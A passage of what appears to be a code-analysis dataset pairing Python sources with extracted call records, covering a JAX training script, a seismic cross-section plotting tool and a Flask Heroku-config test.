9231), True, 'import jax.numpy as jnp\n'), ((10440, 10484), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10476, 10484), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((10857, 10901), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (10893, 10901), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11936, 11964), 'jax.numpy.where', 'jnp.where', (['(outputs > 0)', '(1)', '(0)'], {}), '(outputs > 0, 1, 0)\n', (11945, 11964), True, 'import jax.numpy as jnp\n'), ((14151, 14176), 'numpy.tile', 'np.tile', (['x[-1]', 'tile_dims'], {}), '(x[-1], tile_dims)\n', (14158, 14176), True, 'import numpy as np\n'), ((14696, 14716), 'jax.lax.psum', 'jax.lax.psum', (['x', '"""i"""'], {}), "(x, 'i')\n", (14708, 14716), False, 'import jax\n'), ((16873, 16919), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""tb"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'tb', hparam_str)\n", (16885, 16919), False, 'import os\n'), ((19322, 19346), 'numpy.ceil', 'np.ceil', (['(batch_size / 10)'], {}), '(batch_size / 10)\n', (19329, 19346), True, 'import numpy as np\n'), ((21730, 21785), 'os.path.join', 'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (21742, 21785), False, 'import os\n'), ((21976, 22092), 'absl.logging.info', 'logging.info', (['"""Checking that start_step (%s) == finetune_start_step (%s)"""', 'start_step', 'FLAGS.finetune_start_step'], {}), "('Checking that start_step (%s) == finetune_start_step (%s)',\n start_step, FLAGS.finetune_start_step)\n", (21988, 22092), False, 'from absl import logging\n'), ((24500, 24543), 'absl.logging.info', 'logging.info', (['"""Gathering training metrics."""'], {}), "('Gathering training metrics.')\n", (24512, 24543), False, 'from absl import logging\n'), ((24564, 24601), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['metrics_all'], {}), '(metrics_all)\n', (24588, 24601), False, 'from flax.training import common_utils\n'), ((24674, 24708), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'metrics_all'], {}), '(jnp.sum, metrics_all)\n', (24686, 24708), False, 'import jax\n'), ((24777, 24830), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / denominator)', 'metrics_sums'], {}), '(lambda x: x / denominator, metrics_sums)\n', (24789, 24830), False, 'import jax\n'), ((25673, 25718), 'absl.logging.info', 'logging.info', (['"""Gathering evaluation metrics."""'], {}), "('Gathering evaluation metrics.')\n", (25685, 25718), False, 'from absl import logging\n'), ((25746, 25757), 'time.time', 'time.time', ([], {}), '()\n', (25755, 25757), False, 'import time\n'), ((26031, 26069), 'flax.training.common_utils.get_metrics', 'common_utils.get_metrics', (['eval_metrics'], {}), '(eval_metrics)\n', (26055, 26069), False, 'from flax.training import common_utils\n'), ((26096, 26131), 'jax.tree_map', 'jax.tree_map', (['jnp.sum', 'eval_metrics'], {}), '(jnp.sum, eval_metrics)\n', (26108, 26131), False, 'import jax\n'), ((26215, 26278), 'jax.tree_map', 'jax.tree_map', (['(lambda x: x / eval_denominator)', 'eval_metrics_sums'], {}), '(lambda x: x / eval_denominator, eval_metrics_sums)\n', (26227, 26278), False, 'import 
jax\n'), ((26753, 26799), 'absl.logging.info', 'logging.info', (['"""Gathering beam search metrics."""'], {}), "('Gathering beam search metrics.')\n", (26765, 26799), False, 'from absl import logging\n'), ((7209, 7231), 'flax.linen.log_softmax', 'nn.log_softmax', (['logits'], {}), '(logits)\n', (7223, 7231), True, 'from flax import linen as nn\n'), ((9332, 9376), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (9368, 9376), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((11711, 11755), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', (['config'], {}), '(config)\n', (11747, 11755), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((14794, 14829), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((1,) + x.shape)'], {}), '(x, (1,) + x.shape)\n', (14810, 14829), True, 'import jax.numpy as jnp\n'), ((16452, 16483), 'json.loads', 'json.loads', (['FLAGS.xm_parameters'], {}), '(FLAGS.xm_parameters)\n', (16462, 16483), False, 'import json\n'), ((24132, 24145), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (24143, 24145), False, 'import jax\n'), ((25038, 25062), 'jax.numpy.exp', 'jnp.exp', (["summary['loss']"], {}), "(summary['loss'])\n", (25045, 25062), True, 'import jax.numpy as jnp\n'), ((25087, 25100), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (25098, 25100), False, 'import jax\n'), ((25115, 25183), 'absl.logging.info', 'logging.info', (['"""Train in step: %d, loss: %.4f"""', 'step', "summary['loss']"], {}), "('Train in step: %d, loss: %.4f', step, summary['loss'])\n", (25127, 25183), False, 'from absl import logging\n'), ((25199, 25210), 'time.time', 'time.time', ([], {}), '()\n', (25208, 25210), False, 'import time\n'), ((25868, 25895), 'flax.training.common_utils.shard', 'common_utils.shard', (['batches'], {}), '(batches)\n', (25886, 25895), False, 'from flax.training import common_utils\n'), ((26348, 26361), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (26359, 26361), False, 'import jax\n'), ((26871, 26882), 'time.time', 'time.time', ([], {}), '()\n', (26880, 26882), False, 'import time\n'), ((5777, 5814), 'jax.numpy.minimum', 'jnp.minimum', (['(1.0)', '(step / warmup_steps)'], {}), '(1.0, step / warmup_steps)\n', (5788, 5814), True, 'import jax.numpy as jnp\n'), ((10276, 10361), 'jax.numpy.logical_and', 'jnp.logical_and', (['(programs != config.base_config.bos_token)', '(programs != eos_token)'], {}), '(programs != config.base_config.bos_token, programs != eos_token\n )\n', (10291, 10361), True, 'import jax.numpy as jnp\n'), ((12255, 12306), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12291, 12306), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((12693, 12744), 'latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer', 'models.DecomposeAttentionTransformer', ([], {'config': 'config'}), '(config=config)\n', (12729, 12744), True, 'from latent_programmer.decomposition_transformer_attention import decomposition_models as models\n'), ((24254, 24309), 'os.path.join', 
'os.path.join', (['FLAGS.save_dir', '"""checkpoints"""', 'hparam_str'], {}), "(FLAGS.save_dir, 'checkpoints', hparam_str)\n", (24266, 24309), False, 'import os\n'), ((24323, 24355), 'flax.jax_utils.unreplicate', 'jax_utils.unreplicate', (['optimizer'], {}), '(optimizer)\n', (24344, 24355), False, 'from flax import jax_utils\n'), ((27557, 27587), 'flax.training.common_utils.shard', 'common_utils.shard', (['pred_batch'], {}), '(pred_batch)\n', (27575, 27587), False, 'from flax.training import common_utils\n'), ((29522, 29574), 'jax.tree_map', 'jax.tree_map', (['np.array', '(pred_acc, pred_denominator)'], {}), '(np.array, (pred_acc, pred_denominator))\n', (29534, 29574), False, 'import jax\n'), ((29972, 29985), 'jax.host_id', 'jax.host_id', ([], {}), '()\n', (29983, 29985), False, 'import jax\n'), ((26458, 26469), 'time.time', 'time.time', ([], {}), '()\n', (26467, 26469), False, 'import time\n'), ((28579, 28611), 'absl.logging.info', 'logging.info', (['"""ios: %s"""', 'ios[-1]'], {}), "('ios: %s', ios[-1])\n", (28591, 28611), False, 'from absl import logging\n'), ((28624, 28663), 'absl.logging.info', 'logging.info', (['"""target: %s"""', 'targets[-1]'], {}), "('target: %s', targets[-1])\n", (28636, 28663), False, 'from absl import logging\n'), ((5873, 5910), 'jax.numpy.maximum', 'jnp.maximum', (['(1.0)', '(step - warmup_steps)'], {}), '(1.0, step - warmup_steps)\n', (5884, 5910), True, 'import jax.numpy as jnp\n'), ((5972, 5994), 'jax.numpy.sqrt', 'jnp.sqrt', (['warmup_steps'], {}), '(warmup_steps)\n', (5980, 5994), True, 'import jax.numpy as jnp\n'), ((18178, 18209), 'numpy.argmax', 'np.argmax', (['(program == eos_token)'], {}), '(program == eos_token)\n', (18187, 18209), True, 'import numpy as np\n'), ((30196, 30207), 'time.time', 'time.time', ([], {}), '()\n', (30205, 30207), False, 'import time\n'), ((6019, 6050), 'jax.numpy.maximum', 'jnp.maximum', (['step', 'warmup_steps'], {}), '(step, warmup_steps)\n', (6030, 6050), True, 'import jax.numpy as jnp\n'), ((27309, 27349), 'numpy.ceil', 'np.ceil', (['(cur_pred_batch_size / n_devices)'], {}), '(cur_pred_batch_size / n_devices)\n', (27316, 27349), True, 'import numpy as np\n'), ((6365, 6399), 'jax.numpy.cos', 'jnp.cos', (['(jnp.pi * (progress % 1.0))'], {}), '(jnp.pi * (progress % 1.0))\n', (6372, 6399), True, 'import jax.numpy as jnp\n')]
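The tuples above (and the similar lists later in this section) read like machine-extracted call records for a JAX/Flax training script: each entry appears to pair the character span of a call, its fully qualified callable, the name as written at the call site, the parsed positional and keyword arguments, the source text of the argument list, the span of the callee name, a boolean flag, and the import statement that binds the callee. The schema is not documented here, so the following minimal Python sketch for unpacking one record treats every field name as an inferred assumption rather than a specification.

# Hypothetical reader for one extracted call record; the field names are
# guesses based on the visible data, not a documented schema.
record = (
    (1590, 1615),             # character span of the whole call expression (assumed)
    'sys.path.append',        # fully qualified callable (assumed)
    'sys.path.append',        # callable as written at the call site (assumed)
    (['"""../../"""'], {}),   # parsed positional and keyword arguments (assumed)
    "('../../')\n",           # source text of the argument list (assumed)
    (1605, 1615),             # span of the callee name (assumed)
    False,                    # unexplained flag, meaning unknown (assumed)
    'import sys\n',           # import statement that binds the callee
)

span, qualified, written, (args, kwargs), arg_src, name_span, flag, import_stmt = record
print(f"{qualified} called at {span}, bound by {import_stmt.strip()!r}")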
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import click
import numba


def prepare_data(data_pd, parameter):
    lon_set = set(data_pd["lon"])
    lat_set = set(data_pd["lat"])
    dep_set = set(data_pd["dep"])
    lon_list = sorted(lon_set)
    lat_list = sorted(lat_set)
    dep_list = sorted(dep_set)
    lon_mesh, lat_mesh, dep_mesh = np.meshgrid(
        lon_list, lat_list, dep_list, indexing="ij")
    dx, dy, dz = np.shape(lon_mesh)
    value_mesh = np.zeros_like(lon_mesh)
    x_mesh = np.zeros_like(lon_mesh)
    y_mesh = np.zeros_like(lon_mesh)
    z_mesh = np.zeros_like(lon_mesh)
    r_mesh = np.zeros_like(lon_mesh)
    for i in range(dx):
        for j in range(dy):
            for k in range(dz):
                x_mesh[i, j, k], y_mesh[i, j, k], z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr(
                    lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k])
    for index, row in data_pd.iterrows():
        i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0))
        j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0))
        k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0))
        value_mesh[i, j, k] = row[parameter]
    return x_mesh, y_mesh, z_mesh, value_mesh


def get_value(data_pd, lat, lon, dep, parameter):
    return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon)
                       & (data_pd.dep == dep)][parameter].values[0]


@numba.njit()
def lld2xyzr(lat, lon, dep):
    R_EARTH_KM = 6371.0
    r = (R_EARTH_KM-dep)/R_EARTH_KM
    theta = 90-lat
    phi = lon
    z = r*cosd(theta)
    h = r*sind(theta)
    x = h*cosd(phi)
    y = h*sind(phi)
    return (x, y, z, r)


@numba.njit()
def cosd(x):
    return np.cos(np.deg2rad(x))


@numba.njit()
def sind(x):
    return np.sin(np.deg2rad(x))


# def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh):
#     value_func = RegularGridInterpolator(
#         (x_mesh, y_mesh, z_mesh), value_mesh, method="nearest")
#     return value_func


@numba.njit()
def interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh):
    x, y, z, _ = lld2xyzr(lat, lon, dep)
    distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2
    mindistance2 = np.min(distance2)
    coors = np.where(distance2 == mindistance2)
    value = value_mesh[coors[0][0], coors[1][0], coors[2][0]]
    return value


def generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts):
    lons = np.linspace(lon_list[0], lon_list[1], hnpts)
    lats = np.linspace(lat_list[0], lat_list[1], hnpts)
    deps = np.linspace(dep_list[0], dep_list[1], vnpts)
    return lons, lats, deps


@click.command()
@click.option('--lon1', required=True, type=float, help="lon1")
@click.option('--lon2', required=True, type=float, help="lon2")
@click.option('--lat1', required=True, type=float, help="lat1")
@click.option('--lat2', required=True, type=float, help="lat2")
@click.option('--dep1', required=True, type=float, help="dep1")
@click.option('--dep2', required=True, type=float, help="dep2")
@click.option('--data', required=True, type=str, help="the pickle file")
@click.option('--parameter', required=True, type=str, help="physicial parameter to plot")
@click.option('--hnpts', required=True, type=int, help="horizontal npts")
@click.option('--vnpts', required=True, type=int, help="vertical npts")
def main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts):
    lon_list = [lon1, lon2]
    lat_list = [lat1, lat2]
    dep_list = [dep1, dep2]
    data_pd_raw = pd.read_pickle(data)
    # data_pd is too big
    minlon = min(lon1, lon2)
    maxlon = max(lon1, lon2)
    minlat = min(lat1, lat2)
    maxlat = max(lat1, lat2)
    mindep = min(dep1, dep2)
    maxdep = max(dep1, dep2)
    data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & (
        data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon)
        & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)]
    x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter)
    lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids(
        lon_list, lat_list, dep_list, hnpts, vnpts)
    values = np.zeros((hnpts, vnpts))
    for ih in range(hnpts):
        for iv in range(vnpts):
            values[ih, iv] = interp_value(
                lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh)
            # print(lats_plot[ih], lons_plot[ih], deps_plot[iv], values[ih, iv])

    # plotting part
    plt.figure()
    mesh_plot_lat, mesh_plot_dep = np.meshgrid(
        lats_plot, deps_plot, indexing="ij")
    # get vmin and vmax
    vmin_round = round(np.min(values), 2)
    if(vmin_round < np.min(values)):
        vmin = vmin_round
    else:
        vmin = vmin_round-0.01
    vmax_round = round(np.max(values), 2)
    if(vmax_round > np.max(values)):
        vmax = vmax_round
    else:
        vmax = vmax_round+0.01
    print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round)
    plt.contourf(mesh_plot_lat, mesh_plot_dep, values,
                 101, cmap=plt.cm.seismic_r)
    v = np.arange(vmin, vmax, 0.01)
    plt.colorbar(ticks=v, label="perturbation")
    plt.gca().invert_yaxis()
    plt.xlabel(
        f"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)")
    plt.ylabel("depth(km)")
    plt.show()


if __name__ == "__main__":
    main()
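The script above loads a pickled pandas DataFrame of (lon, lat, dep, value) samples, builds a regular grid with prepare_data, and fills a vertical cross-section by nearest-neighbour lookup in Earth-centred Cartesian coordinates before contouring it. A minimal sketch of that pipeline on synthetic data is shown below; it assumes it runs in the same module as the definitions above (or imports them), and the column name "dvs" and all numbers are made-up placeholders, not values from the original data.

import numpy as np
import pandas as pd

# Tiny synthetic model: a 2 x 2 x 2 grid of (lon, lat, dep) samples with a
# hypothetical perturbation column "dvs"; values are fabricated for illustration.
rows = []
for lon in (100.0, 101.0):
    for lat in (30.0, 31.0):
        for dep in (0.0, 100.0):
            rows.append({"lon": lon, "lat": lat, "dep": dep,
                         "dvs": 0.01 * (lon - 100.0) - 0.0001 * dep})
data_pd = pd.DataFrame(rows)

# Build the Cartesian meshes exactly as the plotting script does.
x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, "dvs")

# Nearest-neighbour sample at an arbitrary point, mirroring what interp_value does.
x, y, z, _ = lld2xyzr(30.2, 100.7, 50.0)
d2 = (x_mesh - x) ** 2 + (y_mesh - y) ** 2 + (z_mesh - z) ** 2
i, j, k = np.unravel_index(np.argmin(d2), d2.shape)
print(value_mesh[i, j, k])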
[ "matplotlib.pyplot.ylabel", "numpy.arange", "pandas.read_pickle", "matplotlib.pyplot.contourf", "click.option", "numpy.where", "matplotlib.pyplot.xlabel", "numpy.max", "numpy.linspace", "numpy.min", "numpy.meshgrid", "click.command", "matplotlib.pyplot.gca", "numba.njit", "numpy.deg2rad", "numpy.shape", "matplotlib.pyplot.show", "matplotlib.pyplot.colorbar", "numpy.zeros", "matplotlib.pyplot.figure", "numpy.zeros_like" ]
[((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1453, 1455), False, 'import numba\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1701, 1703), False, 'import numba\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1763, 1765), False, 'import numba\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\n', (2019, 2021), False, 'import numba\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\n', (2649, 2651), False, 'import click\n'), ((2653, 2715), 'click.option', 'click.option', (['"""--lon1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon1"""'}), "('--lon1', required=True, type=float, help='lon1')\n", (2665, 2715), False, 'import click\n'), ((2717, 2779), 'click.option', 'click.option', (['"""--lon2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon2"""'}), "('--lon2', required=True, type=float, help='lon2')\n", (2729, 2779), False, 'import click\n'), ((2781, 2843), 'click.option', 'click.option', (['"""--lat1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat1"""'}), "('--lat1', required=True, type=float, help='lat1')\n", (2793, 2843), False, 'import click\n'), ((2845, 2907), 'click.option', 'click.option', (['"""--lat2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat2"""'}), "('--lat2', required=True, type=float, help='lat2')\n", (2857, 2907), False, 'import click\n'), ((2909, 2971), 'click.option', 'click.option', (['"""--dep1"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep1"""'}), "('--dep1', required=True, type=float, help='dep1')\n", (2921, 2971), False, 'import click\n'), ((2973, 3035), 'click.option', 'click.option', (['"""--dep2"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep2"""'}), "('--dep2', required=True, type=float, help='dep2')\n", (2985, 3035), False, 'import click\n'), ((3037, 3108), 'click.option', 'click.option', (['"""--data"""'], {'required': '(True)', 'type': 'str', 'help': '"""the pickle file"""'}), "('--data', required=True, type=str, help='the pickle file')\n", (3049, 3108), False, 'import click\n'), ((3110, 3203), 'click.option', 'click.option', (['"""--parameter"""'], {'required': '(True)', 'type': 'str', 'help': '"""physicial parameter to plot"""'}), "('--parameter', required=True, type=str, help=\n 'physicial parameter to plot')\n", (3122, 3203), False, 'import click\n'), ((3200, 3272), 'click.option', 'click.option', (['"""--hnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""horizontal npts"""'}), "('--hnpts', required=True, type=int, help='horizontal npts')\n", (3212, 3272), False, 'import click\n'), ((3274, 3344), 'click.option', 'click.option', (['"""--vnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""vertical npts"""'}), "('--vnpts', required=True, type=int, help='vertical npts')\n", (3286, 3344), False, 'import click\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '"""ij"""'}), "(lon_list, lat_list, dep_list, indexing='ij')\n", (380, 425), True, 'import numpy as np\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\n', (460, 470), True, 'import numpy as np\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (501, 511), True, 'import numpy as np\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (538, 548), True, 'import numpy as np\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', 
(575, 585), True, 'import numpy as np\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (612, 622), True, 'import numpy as np\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (649, 659), True, 'import numpy as np\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\n', (2215, 2226), True, 'import numpy as np\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\n', (2247, 2274), True, 'import numpy as np\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\n', (2459, 2492), True, 'import numpy as np\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\n', (2515, 2548), True, 'import numpy as np\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\n', (2571, 2604), True, 'import numpy as np\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\n', (3538, 3544), True, 'import pandas as pd\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\n', (4180, 4196), True, 'import numpy as np\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4513, 4515), True, 'import matplotlib.pyplot as plt\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '"""ij"""'}), "(lats_plot, deps_plot, indexing='ij')\n", (4562, 4599), True, 'import numpy as np\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\n', (5123, 5141), True, 'import numpy as np\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '"""perturbation"""'}), "(ticks=v, label='perturbation')\n", (5158, 5189), True, 'import matplotlib.pyplot as plt\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f"""latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)"""'], {}), "(\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\n )\n", (5233, 5329), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""depth(km)"""'], {}), "('depth(km)')\n", (5343, 5356), True, 'import matplotlib.pyplot as plt\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1745, 1748), True, 'import numpy as np\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1807, 1810), True, 'import numpy as np\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4664, 4672), True, 'import numpy as np\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4703, 4711), True, 'import numpy as np\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4810, 4818), True, 'import numpy as np\n'), ((4843, 4857), 'numpy.max', 'np.max', 
(['values'], {}), '(values)\n', (4849, 4857), True, 'import numpy as np\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4955, 4963), True, 'import numpy as np\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4971, 4979), True, 'import numpy as np\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n')]
from flask import Flask
from flask_appconfig import HerokuConfig


def create_sample_app():
    app = Flask('testapp')
    HerokuConfig(app)
    return app


def test_herokupostgres(monkeypatch):
    monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri')
    app = create_sample_app()
    assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'
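The test above uses pytest's monkeypatch fixture to set the Heroku-style environment variable before the app is created. For context, a standalone sketch of the same behaviour is given below; the database URL is a placeholder, and it assumes flask and flask_appconfig are installed.

import os
from flask import Flask
from flask_appconfig import HerokuConfig

# Placeholder URL; per the test above, HerokuConfig is expected to copy it
# into app.config['SQLALCHEMY_DATABASE_URI'].
os.environ['HEROKU_POSTGRESQL_ORANGE_URL'] = 'postgres://user:secret@host:5432/db'

app = Flask('demo')
HerokuConfig(app)
print(app.config.get('SQLALCHEMY_DATABASE_URI'))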
[ "flask_appconfig.HerokuConfig", "flask.Flask" ]
[((102, 118), 'flask.Flask', 'Flask', (['"""testapp"""'], {}), "('testapp')\n", (107, 118), False, 'from flask import Flask\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\n', (135, 140), False, 'from flask_appconfig import HerokuConfig\n')]